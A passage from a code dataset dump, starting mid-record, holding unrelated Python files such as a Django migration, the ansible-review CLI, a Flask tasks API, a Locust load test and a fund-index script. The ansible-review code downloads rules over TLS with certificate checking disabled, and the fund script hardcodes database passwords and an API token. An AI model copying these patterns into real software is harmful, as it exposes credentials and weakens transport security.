],\n 'strides': [\n [1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1],\n ]\n}","sub_path":"model_definition/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210747351","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('DotaStats', '0003_scikitmodel'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='playerinmatch',\n name='hero_damage',\n field=models.IntegerField(),\n preserve_default=True,\n ),\n ]\n","sub_path":"migrations/0004_auto_20150406_1555.py","file_name":"0004_auto_20150406_1555.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"606395874","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport logging\nimport optparse\nimport os\nimport sys\nimport io\nimport glob\nimport ssl\nfrom urllib2 import urlopen\nfrom zipfile import ZipFile\nfrom ansiblereview.version import __version__\nfrom ansiblereview import classify\nfrom ansiblereview.utils import info, warn, read_config\nfrom appdirs import AppDirs\nfrom pkg_resources import resource_filename\n\n\ndef get_candidates_from_diff(difftext):\n try:\n import unidiff\n except ImportError as e:\n raise SystemExit(\"Could not import unidiff library: %s\", e.message)\n patch = unidiff.PatchSet(sys.stdin)\n\n candidates = []\n for patchedfile in [patchfile for patchfile in\n patch.added_files + patch.modified_files]:\n if patchedfile.source_file == '/dev/null':\n candidates.append(patchedfile.path)\n else:\n lines = \",\".join([\"%s-%s\" % (hunk.target_start, hunk.target_start + hunk.target_length)\n for hunk in patchedfile])\n candidates.append(\"%s:%s\" % (patchedfile.path, lines))\n return candidates\n\n\ndef 
main():\n config_dir = AppDirs(\"ansible-review\", \"com.github.willthames\").user_config_dir\n default_config_file = os.path.join(config_dir, \"config.ini\")\n\n parser = optparse.OptionParser(\"%prog playbook_file|role_file|inventory_file\",\n version=\"%prog \" + __version__)\n parser.add_option('-c', dest='configfile', default=default_config_file,\n help=\"Location of configuration file: [%s]\" % default_config_file)\n parser.add_option('-w', dest='workdir',\n help=\"Dir to look for files, also used to checkout git repo if specified\")\n parser.add_option('-g', dest='ruleszip',\n help=\"Weburl containing zip location of rules i.e from a git repo\")\n parser.add_option('-d', dest='rulesdir',\n help=\"Location of standards rules relative if -g used\")\n parser.add_option('-r', dest='lintdir',\n help=\"Location of additional lint rules relative if -g used\")\n parser.add_option('-q', dest='log_level', action=\"store_const\", default=logging.WARN,\n const=logging.ERROR, help=\"Only output errors\")\n parser.add_option('-s', dest='standards_filter', action='append',\n help=\"limit standards to specific names\")\n parser.add_option('-t', dest='output_type', action=\"store_const\", default=\"stdout\",\n const=\"cc\", help=\"Change to Code Climate output type\")\n parser.add_option('-v', dest='log_level', action=\"store_const\", default=logging.WARN,\n const=logging.INFO, help=\"Show more verbose output\")\n\n options, args = parser.parse_args(sys.argv[1:])\n settings = read_config(options.configfile)\n\n # Merge CLI options with config options. 
CLI options override config options.\n for key, value in settings.__dict__.iteritems():\n if not getattr(options, key):\n setattr(options, key, getattr(settings, key))\n\n if options.ruleszip and options.workdir:\n zipurl = options.ruleszip\n tlscontext = ssl._create_unverified_context()\n if zipurl.startswith('http'):\n zipresp = urlopen(zipurl, context=tlscontext)\n else:\n zipresp = open(zipurl, 'r')\n zfile = ZipFile(io.BytesIO(zipresp.read()))\n zfile.extractall(options.workdir)\n\n if options.workdir:\n if options.rulesdir and options.ruleszip:\n rulesdirtmp = glob.glob(options.workdir + \"/*/\" + options.rulesdir)\n info(\"Using standards rules from: %s\" % rulesdirtmp[0], options)\n options.rulesdir = rulesdirtmp[0]\n else:\n rulesdirtmp = os.path.join(options.workdir, options.rulesdir)\n info(\"Using standards rules from: %s\" % rulesdirtmp, options)\n options.rulesdir = rulesdirtmp\n\n if options.lintdir and options.ruleszip:\n lintdirtmp = glob.glob(options.workdir + \"/*/\" + options.lintdir)\n info(\"Using lint rules from: %s\" % lintdirtmp[0], options)\n options.lintdir = lintdirtmp[0]\n else:\n lintdirtmp = os.path.join(options.workdir, options.lintdir)\n info(\"Using lint rules from: %s\" % lintdirtmp, options)\n options.lintdir = lintdirtmp\n\n if os.path.exists(options.configfile):\n info(\"Using configuration file: %s\" % options.configfile, options)\n else:\n if not options.rulesdir:\n rules_dir = os.path.join(resource_filename('ansiblereview', 'examples'))\n warn(\"Using example standards found at %s\" % rules_dir, options, file=sys.stderr)\n options.rulesdir = rules_dir\n if not options.lintdir:\n lint_dir = os.path.join(options.rulesdir, 'lint-rules')\n if os.path.exists(lint_dir):\n warn(\"Using example lint-rules found at %s\" % lint_dir, options, file=sys.stderr)\n options.lintdir = lint_dir\n if not options.rulesdir and not options.lintdir:\n warn(\"No configuration file found at %s\" % options.configfile, options, file=sys.stderr)\n\n if 
len(args) == 0:\n candidates = get_candidates_from_diff(sys.stdin)\n else:\n candidates = args\n\n errors = 0\n for filename in candidates:\n if ':' in filename:\n (filename, lines) = filename.split(\":\")\n else:\n lines = None\n candidate = classify(filename)\n if candidate:\n if candidate.binary:\n warn(\"Not reviewing binary file %s\" % filename, options)\n continue\n if lines:\n info(\"Reviewing %s lines %s\" % (candidate, lines), options)\n else:\n info(\"Reviewing all of %s\" % candidate, options)\n errors = errors + candidate.review(options, lines)\n else:\n warn(\"Couldn't classify file %s\" % filename, options)\n return errors\n","sub_path":"lib/ansiblereview/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"193172855","text":"\"\"\"Plot the results of the WM segmentation and compare it with the ICBM152 2009\natlas.\n\nParameters\n----------\nPATH_TO_DATA: list of str\n The path is a list of filename with possibility to use a wildcard, e.g.\n ['/example/*/file.nii.gz', '/anotherone/*/file.nii.gz].\n\nPATH_OUTPUT : str\n Location to store the plots. 
To easily generate the HTML report, it should\n be located in the same repository in `images/qa`\n\n\"\"\"\n\nimport glob\nfrom os import makedirs, listdir\nfrom os.path import join, exists, basename, normpath, isdir\nimport matplotlib.pyplot as plt\nfrom nilearn.datasets import fetch_icbm152_2009\nfrom nilearn.image import load_img\nfrom nilearn.plotting import plot_epi\n\ntemplate = fetch_icbm152_2009()\nwm_template = load_img(template.wm)\ncsf_template = load_img(template.csf)\n\nPATH_TO_DATA = ['/home/lemaitre/Documents/data/ABIDEII-IP_1/*']\nPATH_OUTPUT = './images/qa'\n\nsubjects_path = []\nfor pdata in PATH_TO_DATA:\n subjects_path += glob.glob(pdata)\nsubjects_path = sorted(subjects_path)\nsubjects_path = [sp for sp in subjects_path if isdir(sp)]\n\n# all data are display in the standard space\nfor path_subject in subjects_path:\n # try:\n content_dir = listdir(path_subject)\n run_path = sorted([folder\n for folder in content_dir\n if isdir(join(path_subject, folder)) and\n 'run_' in folder])\n subject_id = basename(normpath(path_subject))\n for rp in run_path:\n # get the mean which is stored outside of the data path\n mean_func_img = load_img(join(\n path_subject, rp, 'session_1', 'rest_1',\n 'rest_filt_mean_func2standard.nii.gz'))\n wm_seg_img = load_img(join(path_subject, rp,\n 'session_1', 'segment',\n 'wm2standard.nii.gz'))\n csf_seg_img = load_img(join(path_subject, rp,\n 'session_1', 'segment',\n 'csf2standard.nii.gz'))\n\n if not exists(join(PATH_OUTPUT, subject_id, rp)):\n makedirs(join(PATH_OUTPUT, subject_id, rp))\n\n print('Checking patient in path: {}'.format(path_subject))\n\n display = plot_epi(mean_func_img, title='WM segmentation',\n draw_cross=False, cut_coords=(17., -3., 8.))\n display.add_contours(wm_seg_img, levels=[0.3], colors='w')\n display.add_contours(wm_template, levels=[0.3], colors='w',\n linestyles='dashed')\n plt.savefig(join(PATH_OUTPUT, subject_id, rp, 'wm.png'))\n # except ValueError:\n # print('Missing data for patient: 
{}'.format(path_subject))\n","sub_path":"quality_assurance/segmentation_quality_check.py","file_name":"segmentation_quality_check.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"37051263","text":"\"\"\"\nSimluating the scenario where all requests from users are read intensive.\n\"\"\"\n\nimport sys, random\nfrom locust import HttpLocust, TaskSet\n\n\ndef readPost(locust):\n # Use '/editor/post?action=open' as name for the request\n postid = random.randint(1, 500)\n url_prefix = '/editor/post?action=open'\n url_params = '&username=cs144&postid=' + str(postid)\n locust.client.get(url_prefix + url_params, name = url_prefix)\n\nclass MyTaskSet(TaskSet):\n tasks = [readPost]\n\nclass MyLocust(HttpLocust):\n task_set = MyTaskSet\n min_wait = 1000\n max_wait = 2000","sub_path":"Project5_Web_Benchmark_and_Spark/read_tomcat.py","file_name":"read_tomcat.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"503728911","text":"import subprocess\nimport os\nimport shutil\nfrom zipfile import ZipFile\n\n# create requirements file\nif os.path.exists(\"pipfile.lock\") == True:\n # create requirements file\n requirements = open(\"requirements.txt\", 'w')\n subprocess.call([\"pipenv\", \"lock\", \"-r\"], stdout= requirements)\n print(\"requirements file created\")\n #install dependencies to temp packages catalog\n subprocess.call([\"pip3\", \"install\", \"-r\", \"requirements.txt\", \"--target\", \"./packages\"])\n print(\"dependencies installed\")\n requirements.close()\n # copy project dependencies\n src = os.getcwd()\n dst = os.path.join(src, \"packages\")\n\n for item in os.listdir(src):\n if item in (\"base\", \"utils\"):\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if os.path.isdir(s):\n if os.path.exists(d):\n shutil.rmtree(d)\n shutil.copytree(s, d, 
symlinks=True)\n else:\n shutil.copy2(s, d, follow_symlinks=True)\n print(\"local dependencies copied\")\n\n # zip packages\n zip_file = ZipFile(\"packages.zip\" , mode='w')\n path_len = len(\"packages\")\n for root, _ , files in os.walk(\"packages\"):\n for file in files:\n file_path = os.path.join(root, file)\n zip_file.write(file_path , file_path[path_len :] )\n zip_file.close()\n os.remove(\"./requirements.txt\")\n shutil.rmtree(dst)\nelse:\n exit(\"Missing pipfile.lock\")\n","sub_path":"build_dependencies.py","file_name":"build_dependencies.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212199772","text":"from flask import Blueprint, Flask, jsonify, abort, request, make_response, url_for\nfrom app import db \n\nmodule_api = Blueprint('api', __name__, url_prefix='/api') \n\n\n\ntasks = [\n {\n 'id': 1,\n 'title': u'Buy groceries',\n 'description': u'Milk, Cheese, Pizza, Fruit, Tylenol',\n 'done': False\n },\n {\n 'id': 2,\n 'title': u'Learn Python',\n 'description': u'Need to find a good Python tutorial on the web',\n 'done': False\n }\n]\n\n\ndef make_public_task(task):\n new_task = {}\n for field in task:\n if field == 'id':\n new_task['uri'] = url_for('get_task', task_id=task['id'],\n _external=True)\n else:\n new_task[field] = task[field]\n return new_task\n\n\n@module_api.route('/tasks', methods=['GET'])\ndef get_tasks():\n #return jsonify({'tasks': [make_public_task(task) for task in tasks]})\n return jsonify(tasks)\n\n\n@module_api.route('/tasks/', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': make_public_task(task[0])})\n\n\n@module_api.route('/tasks', methods=['POST'])\ndef create_task():\n if not request.json or 'title' not in request.json:\n abort(400)\n task = {\n 'id': tasks[-1]['id'] + 1,\n 'title': request.json['title'],\n 
'description': request.json.get('description', \"\"),\n 'done': False\n }\n tasks.append(task)\n return jsonify({'task': make_public_task(task)}), 201\n\n\n@module_api.route('/tasks/', methods=['PUT'])\ndef update_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n if not request.json:\n abort(400)\n if 'title' in request.json and \\\n not isinstance(request.json['title'], six.string_types):\n abort(400)\n if 'description' in request.json and \\\n not isinstance(request.json['description'], six.string_types):\n abort(400)\n if 'done' in request.json and type(request.json['done']) is not bool:\n abort(400)\n task[0]['title'] = request.json.get('title', task[0]['title'])\n task[0]['description'] = request.json.get('description',\n task[0]['description'])\n task[0]['done'] = request.json.get('done', task[0]['done'])\n return jsonify({'task': make_public_task(task[0])})\n\n\n@module_api.route('/tasks/', methods=['DELETE'])\ndef delete_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n tasks.remove(task[0])\n return jsonify({'result': True})\n","sub_path":"app/api/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"477440141","text":"import pandas as pd\nimport numpy as np\n\n# df_all = pd.DataFrame.from_csv('SPO_UP_50000.csv', index_col=None, sep='\\t')\ndf_all = pd.DataFrame.from_csv('SPO_UPDATED.csv', index_col=None, sep='\\t')\n\nprint('all', len(df_all))\nmain_data = ['SPO4__CSF__C', 'SPO4__OUTCOME__C']\n\nrename_dict = {'SPO4__PLAYBOOK_NAME__C': 'PlayBook',\n 'SPO4__OUTCOME_STAGE__C': 'Stage',\n 'SPO4__CSF_CATEGORY__C': 'CSF_category',\n 'SPO4__CSF__C': 'CSF',\n 'SPO4__OUTCOME__C': 'Outcome'\n }\n\n# print(copy_group_columns)\n\n\ndf_all = df_all[(df_all['SPO4__PLAYBOOK_NAME__C'] == 'Competitive deal >$50M >$25M 
CE/UKI or >$10M APAC/LATAM/MEA')\n | (df_all['SPO4__PLAYBOOK_NAME__C'] == 'Competitive deal $10-50M $10-25M CE/UKI or $5-10M APAC/LATAM/MEA')\n | (df_all['SPO4__PLAYBOOK_NAME__C'] == 'Competitive deal $2-10M or $2-5M APAC/LATAM/MEA')\n]\n\n\ngroups = [\n ['1',],\n ['2',],\n ['3',],\n ['4',],\n ['5',],\n ['1', '2',],\n ['3', '4',],\n ['3', '4', '5',],\n ['1', '2', '3', '4',],\n ['1', '2', '3', '4', '5',],\n\n]\ndf_all['COLOR_NUM'] = df_all['SPO4__COLOR__C']\ndf_all.COLOR_NUM.replace(['green', 'grey', 'red'], [1, 0, -1], inplace=True)\n\ndf_all.SPO4__OUTCOME_STAGE__C.replace([\n '1. Engagement',\n '2. Shaping',\n '3. Solutioning',\n '4. End-Game',\n '5. Negotiation'],\n ['1', '2', '3', '4', '5', ], inplace=True)\n\n\ngroup_columns = ['SPO4__CSF__C', 'SPO4__OPPORTUNITY__C']\ncopy_group_columns = group_columns.copy()\ncopy_group_columns.append('COLOR_NUM')\n\nfor group in groups:\n print('!!! group!!!')\n print(group)\n\n df_group = pd.DataFrame()\n\n for stage in group:\n df_part = df_all[df_all['SPO4__OUTCOME_STAGE__C'] == stage]\n df_group = df_group.append(df_part)\n\n print('group grom all len', len(df_group))\n\n df_book_with_csf = df_group[copy_group_columns].groupby(group_columns).agg(['min'])\n\n df_book_with_csf.reset_index(inplace=True)\n print('size of groupby',len(df_book_with_csf))\n\n # df_book_with_csf.to_csv('t.csv')\n df_result = pd.DataFrame()\n opportunities = list(set(df_group['SPO4__OPPORTUNITY__C'].drop_duplicates()))\n df_result['SPO4__OPPORTUNITY__C'] = opportunities\n df_result.set_index('SPO4__OPPORTUNITY__C', inplace=True)\n\n\n # print(df_result)\n\n results = df_group[['SPO4__OPPORTUNITY__C', 'SPO4__PLAYBOOK_NAME__C', 'OPPORTUNITY_WON__C']].drop_duplicates()\n\n results.set_index('SPO4__OPPORTUNITY__C', inplace=True)\n\n df_result = df_result.merge(results, how='left', left_index=True, right_index=True)\n\n csfs = list(set(df_group['SPO4__CSF__C'].drop_duplicates()))\n print('CSF:', len(csfs))\n csfs.sort()\n\n for csf in csfs:\n # 
df_result[csf] = np.nan\n df_result[csf] = 0\n\n for i, row in df_book_with_csf.iterrows():\n\n op = row['SPO4__OPPORTUNITY__C'].values[0]\n cs = row['SPO4__CSF__C'].values[0]\n num = row['COLOR_NUM']['min']\n\n df_result.loc[op, cs] = num\n\n # df_won = df_result[df_result['OPPORTUNITY_WON__C'] == 'Won']\n # df_won.fillna(1, inplace = True)\n # df_lost = df_result[df_result['OPPORTUNITY_WON__C'] == 'Lost']\n # df_lost.fillna(-1, inplace = True)\n # df_result = df_won.append(df_lost)\n\n\n\n print('group_result_size', df_result.size)\n name_group = \"_\".join(group)\n df_result.to_csv('csf_data_sets\\csf_{}.csv'.format(name_group), index=True,sep='\\t')\n#\n# # df_csf['part_green/(green+red+grey)%'] = (df_csf['green'] * 100.0)/(df_csf['green'] + df_csf['grey'] + df_csf['red'])\n# # df_csf['part_won/(won+lost) %'] = (df_csf['Won'] * 100.0)/(df_csf['Won'] + df_csf['Lost'])\n# # df_csf.fillna(0, inplace=True)\n#\n# # print(df_csf)\n# df_csf.rename(index=str, columns=rename_dict, inplace=True)\n# print(df_csf)\n# df_csf.to_excel(writer, sheet_name='data', index=False)\n\n#\n#\n# df_csf.to_excel('csf.xlsx', index=False)\n# df_oc.to_excel('oc.xlsx', index=False)\n","sub_path":"CTS/create_groupby_csf.py","file_name":"create_groupby_csf.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"81894276","text":"#Here text is case sensitive so Dat and dat are mapped to diffrent word index. 
Moreover punctuation is maintained\r\n\r\nimport tensorflow as tf\r\nimport tensorflow_datasets as tfds\r\nimport numpy as np\r\nfrom tensorflow.keras.preprocessing.text import Tokenizer\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\nimport io\r\n\r\n\r\nembedding_dim = 64\r\n\r\ntraining_sentences = []\r\ntraining_labels = []\r\nimdb, info = tfds.load(\"imdb_reviews/subwords8k\", with_info=True, as_supervised=True) #tokenized and encoded imdb dataset with vocab size of 8k i.e tokenizer.vocab_size = 8185\r\ntrain_data, test_data = imdb['train'], imdb['test']\r\ntokenizer = info.features['text'].encoder # The dataset info includes the text encode\r\n\r\n\r\nprint(len(tokenizer.subwords)) #7928\r\nprint(tokenizer.subwords) #['the_', ', ', '. ', 'a_', 'and_', 'of_', 'to_', 's_', 'is_', 'br', 'in_', 'I_', 'that_', 'this_', 'it_', ' /><',.........]\r\n\r\nBUFFER_SIZE = 10000\r\nBATCH_SIZE = 64\r\n\r\ntrain_data = train_data.shuffle(BUFFER_SIZE)\r\ntrain_data = train_data.padded_batch(BATCH_SIZE, padded_shapes=([None],[]))\r\ntest_data = test_data.padded_batch(BATCH_SIZE,padded_shapes=([None],[]))\r\n\r\n\r\nsample = 'Data Science is a very cool, and amazing thing to learn'\r\ntoken_string = tokenizer.encode(sample) #[878, 1848, 2675, 2975, 9, 4, 67, 2724, 2, 5, 1006, 233, 7, 5635]\r\n\r\nprint(token_string)\r\n\r\norig_string = tokenizer.decode(token_string)\r\nprint(orig_string)\r\n\r\nprint(tokenizer.vocab_size) #8185\r\n\r\nfor t in token_string:\r\n\tprint('{} --> {}'.format(t, tokenizer.decode([t])))\r\n'''\r\n878 --> Da\r\n1848 --> ta\r\n2675 --> Sci\r\n2975 --> ence\r\n9 --> is\r\n4 --> a\r\n67 --> very\r\n2724 --> cool\r\n2 --> ,\r\n5 --> and\r\n1006 --> amazing\r\n233 --> thing\r\n7 --> to\r\n5635 --> learn\r\n'''\r\nmodel = tf.keras.Sequential([\r\n\t\r\n tf.keras.layers.Embedding(input_dim = tokenizer.vocab_size, output_dim = embedding_dim), #The results of the embedding will be a 2D vector with one embedding for each word in the 
input sequence of words (input sentence)\r\n tf.keras.layers.GlobalAveragePooling1D(), #Often in natural language processing, a different layer type than a Flatten is used, and this is a GlobalAveragePooling1D. The reason for this is the size of the output vector being fed into the dense\r\n tf.keras.layers.Dense(6, activation='relu'),\r\n tf.keras.layers.Dense(1, activation='sigmoid')\r\n])\r\nmodel.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])\r\nmodel.summary()\r\n\r\nnum_epochs = 10\r\nmodel.fit(train_data, epochs=num_epochs, validation_data=test_data)\r\n\r\n","sub_path":"NLP using TF/Week 2/subwrd_token_2.py","file_name":"subwrd_token_2.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"556188500","text":"import argparse\nimport email\nimport logging\nimport io\nimport re\nimport sys\n\nfrom datetime import datetime\nfrom shared import get_logger, init_exception_handler\n\n\n####################################################################################################\n#\n# Parse image from a raw email and save it to disk\n# This is super specific to uploading the image from dvr163 emails\n#\n####################################################################################################\n\n# Read arguments\nparser = argparse.ArgumentParser(description='Save images from email')\nparser.add_argument(\n 'infile',\n nargs='?',\n type=argparse.FileType('r'),\n default=sys.stdin,\n help='MIME-encoded email file(if empty, stdin will be used)')\nparser.add_argument('--out_directory', required=True)\nparser.add_argument('--log_level', default='40', help='10=debug 20-info 30=warning 40=error', type=int)\nparser.add_argument('--log_file', default='email2file.log', help='Log file location', type=str)\nargs = parser.parse_args() \n\n# Configure logging\nlogger = get_logger(args.log_level, args.log_file)\nlogger.debug(args)\n\n# Log 
exceptions\ninit_exception_handler(logger)\n\n# Read infile (is stdin if no arg) \nstdin_data = args.infile.read()\nargs.infile.close()\nlogger.debug('in:\\n' + stdin_data)\nmsg = email.message_from_string(stdin_data)\n\n# Parse out the html text\nhtml_part = msg.get_payload(0).get_payload()\nclean_html = re.sub(r'(?is)<(script|style).*?>.*?()', '', html_part.strip()) # Remove style tags\nhtml_text = re.sub(r'(?s)<.*?>', ' ', clean_html).strip() # Get text content\ntext_parts = html_text.split(\"; \")\nlogger.debug('Found HTML text: ' + html_text)\nchannel_number = text_parts[0][-1:]\ntimestamp = re.sub(r' ', '_', re.sub(r'[-:]', '', text_parts[1][5:]))\n\n# Read the image\nimage_part = msg.get_payload(1).get_payload()\nfile_name = timestamp + '.jpg'\nfile = io.BytesIO(image_part.decode('base64')).read()\n\n# Save\nout_path = args.out_directory + '/snapshot_cam_' + channel_number + '.jpg'\nlogger.debug('Saving ' + out_path)\nout_file = open(out_path, \"w\")\nout_file.write(file)\nout_file.close()\n\nlogger.info('Saved ' + file_name)\n","sub_path":"email2file.py","file_name":"email2file.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"499370496","text":"import queries\nimport datetime\n\n\ndef active_users(executor):\n nicks = queries.all_nicks(executor)\n filtered_nicks = list()\n\n for nick in nicks:\n if is_user_active(executor, nick) and not is_user_a_bot(nick):\n filtered_nicks.append(nick)\n\n return filtered_nicks\n\n\ndef is_user_active(executor, nick):\n time = datetime.timedelta(weeks=1)\n date = datetime.datetime.utcnow()\n date = date - time\n\n num = queries.get_distinct_line_count_since_date(executor, nick, date.isoformat())\n\n return num > 15\n\n\ndef is_user_a_bot(nick):\n return nick[-1] == 
'^'\n","sub_path":"userutils.py","file_name":"userutils.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266844034","text":"from importlib import reload\nimport sys\nsys.path.append(\"D:/Projects/PythonProject/ZSAssetManagementResearch/Scripts/algorithm\")\nsys.path.append(\"D:/Projects/Python/3.5.2/ZSAssetManagementResearch/Scripts/algorithm\")\nsys.path.append(\"/usr/local/python/3.5.2/user-defined-module\")\nimport calendar as cld\nimport datetime as dt\nimport json\nimport numpy as np\nimport pandas as pd\nimport requests\nfrom sqlalchemy import create_engine, inspect\nimport time\nimport TimeModule as T\nimport DerivedIndicator_Fund_2 as F\n\ndef tic(string):\n print(dt.datetime.now(), \"------\", string)\n\ndef merge_result(r1, r2, r3):\n result = r1[:]\n for i in range(len(result[1])):\n if result[1][i] is None:\n if r2[1][i] is not None:\n result[1][i] = r2[1][i]\n result[0][i] = r2[0][i]\n else:\n if r3[1][i] is not None:\n result[1][i] = r3[1][i]\n result[0][i] = r3[0][i]\n else:\n continue\n return result\n\nresult_r = {}\ncomponents_num = {}\n\nfirst_year = 2014\nnow = dt.datetime.now()\nnow_str = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\nfor year in range(first_year, now.timetuple().tm_year+1):\n\n if year == now.timetuple().tm_year:\n month = 9\n else:\n month = 12\n\n date_s = dt.datetime(year, month, 10)\n date_e = date_s + dt.timedelta(1)\n date_e_str = date_e.strftime(\"%Y-%m-%d\")\n\n sql_i = \"\\\n SELECT fund_id, nav, statistic_date FROM fund_nv_data WHERE statistic_date < '{0}' and statistic_date >= '{1}' \\\n AND fund_id IN (SELECT fund_id FROM fund_type_mapping WHERE type_code = 60108) \\\n ORDER BY fund_id ASC, statistic_date DESC \\\n \".format(dt.date(year+1, 1, 8), dt.date(year-1, 12, 1))\n\n #conn = create_engine(\"mysql+pymysql://jr_admin_test_0:e6524540d9733355c27d344876b15cf467251215@120.55.69.127:3306/base?charset=utf8\")\n conn = 
create_engine(\"mysql+pymysql://jr_admin_test_0:e6524540d9733355c27d344876b15cf467251215@127.0.0.1:3306/base?charset=utf8\")\n conn.connect()\n\n tic(\"Getting Data\")\n d = pd.read_sql(sql_i, conn).dropna()\n d.index = range(len(d))\n\n tic(\"Preprocessing...\")\n d[\"statistic_date\"] = d[\"statistic_date\"].apply(lambda x: time.mktime(x.timetuple()))\n d_dd = d.drop_duplicates(\"fund_id\")\n idx_slice = d_dd.index.tolist()\n idx_slice.append(len(d))\n ids = d_dd[\"fund_id\"].tolist()\n\n t_std = T.timeseries_std(dt.datetime(year, month, 10), month, 12, 1, use_lastday=True)\n t_std1 = t_std[:-1]\n\n tic(\"Grouping...\")\n ds = [d[idx_slice[i]:idx_slice[i+1]] for i in range(len(idx_slice)-1)]\n ts = [x[\"statistic_date\"].tolist() for x in ds]\n navs = [x[\"nav\"].tolist() for x in ds]\n\n tic(\"Matching...\")\n matchs1 = [T.outer_match4index_f7(x, t_std1, False) for x in ts]\n #matchs2 = [T.outer_match4index_b7(x, t_std1, False) for x in ts]\n matchs2 = [T.outer_match4index_b7_2(x, t_std1) for x in ts]\n matchs3 = [T.outer_match4index_m(x, t_std, False) for x in ts]\n matchs = [merge_result(x1, x2, x3) for x1, x2, x3 in zip(matchs1, matchs2, matchs3)]\n\n tic(\"Getting Result...\")\n t_matchs = [x[0] for x in matchs]\n t_matchs = [T.tr(x) for x in t_matchs]\n idx_matchs = [x[1] for x in matchs]\n nav_matchs = [[navs[i][idx] if idx is not None else None for idx in idx_matchs[i].values()] for i in range(len(idx_matchs))]\n\n\n tic(\"Calculating Index...\")\n nvs = pd.DataFrame(nav_matchs).T.astype(float).as_matrix()\n rs = nvs[:-1] / nvs[1:] - 1\n rs[rs>30] = np.nan\n rs[rs<-1] = np.nan\n r = np.nanmean(rs, axis=1)\n r[np.isnan(r)] = 0\n\n result_r[year] = r\n components_num[year] = np.sum(~np.isnan(rs), axis=1)\n tic(\"Year:{0}, Done...\".format(year))\n\nvalues_r = []\nvalues_num = []\nfor year in range(first_year, now.timetuple().tm_year+1):\n if len(values_r) == 0:\n values_r = result_r[year].tolist()[::-1]\n values_num = components_num[year].tolist()[::-1]\n 
else:\n values_r.extend(result_r[year].tolist()[::-1])\n values_num.extend(components_num[year].tolist()[::-1])\n\nresult = (np.array(values_r) + 1).cumprod() * 1000\nresult = result.tolist()\nresult.insert(0, 1000)\nvalues_num.insert(0, 0)\n\ntag = T.timeseries_std(dt.datetime(year, month+1, 10), T.periods_in_interval(dt.datetime(year, month+1, 10), dt.datetime(first_year, 1, 10), 12), 12)[::-1]\ntag = [dt.date.fromtimestamp(x) for x in tag]\n\n#op = pd.DataFrame(list(zip(tag, result, values_num)))\n#op.columns = [\"date\", \"index_m_yu\", \"components_num\"]\n#op.to_csv(\"C:\\\\Users\\\\Kael Yu\\\\Desktop\\\\fund_index_12_m.csv\", index=False)\n\n\n#Send Result\n\nurl_status = \"http://120.55.69.127:8080/get_data-api/program/forward/status\"\nurl_progress = \"http://120.55.69.127:8080/get_data-api/program/forward/progress\"\nurl_result = \"http://120.55.69.127:8080/get_data-api/program/get_data/write\"\ns = requests.session()\n\ntoken = \"bda1850a2a907fa33b0cb1241f5f742bb4138b1c\"\nparams = sys.argv[1]\npl = {\"token\":str(token), \"parms\":str(params)}\n\ndatas = []\nfor i in range(len(tag)):\n res_tmp = {\"index_id\": \"FI12\", \"index_name\":\"多策略私募指数\", \"statistic_date\":str(tag[i]), \"update_time\":now_str,\n \"typestandard_code\": \"601\", \"typestandard_name\": \"按投资策略分类\", \"type_code\": \"60108\", \"type_name\": \"多策略\",\n \"index_method\": \"1\", \"data_source\":\"0\", \"data_source_name\":\"私募云通\",\n \"index_value\": str(result[i]), \"funds_number\": str(values_num[i])\n }\n datas.append(res_tmp)\n\nfields = \"\"\nfor field in datas[0].keys():\n fields += \",%s\"%(field)\nfields = fields[1:]\n\npl_result = pl.copy()\npl_result[\"result\"] = str({\"db_name\":\"base\",\n \"table_name\":\"fund_month_index\",\n \"param_fields\":fields,\n \"update_fields\":fields,\n \"datas\": datas\n })\nr = s.post(url_result, pl_result)\nprint(\"result_api:\\n%s\" % r.text)\n\npl_status = pl.copy()\npl_status[\"status\"] = \"EXEC_SUCCESS\"\nr = s.post(url_status, 
